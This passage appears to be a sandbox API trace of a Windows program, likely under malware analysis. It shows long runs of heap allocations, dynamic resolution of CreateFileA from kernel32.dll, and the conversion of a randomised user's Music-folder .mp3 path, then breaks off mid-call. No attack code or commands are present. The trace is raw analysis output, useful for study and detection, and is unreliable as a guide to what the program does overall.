hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.003] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.003] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0186.003] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.004] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.004] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0186.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0186.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0186.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0186.004] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd978 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0186.004] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0186.004] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0186.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0186.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0186.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0186.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.005] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.005] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.006] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0186.006] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0186.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0186.007] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.007] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0186.008] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0186.008] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.008] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.009] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.009] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.010] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.010] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.011] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.011] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.011] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda98 [0186.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.012] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0186.012] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda98 [0186.012] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0186.012] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0186.012] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0186.013] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0186.013] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0186.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", cchWideChar=93, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 93 [0186.014] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5d) returned 0x9a5d78 [0186.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", cchWideChar=93, lpMultiByteStr=0x9a5d78, cbMultiByte=93, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\eGfFOaa4l\\pKoP0.mp3", lpUsedDefaultChar=0x0) returned 93 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0186.014] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 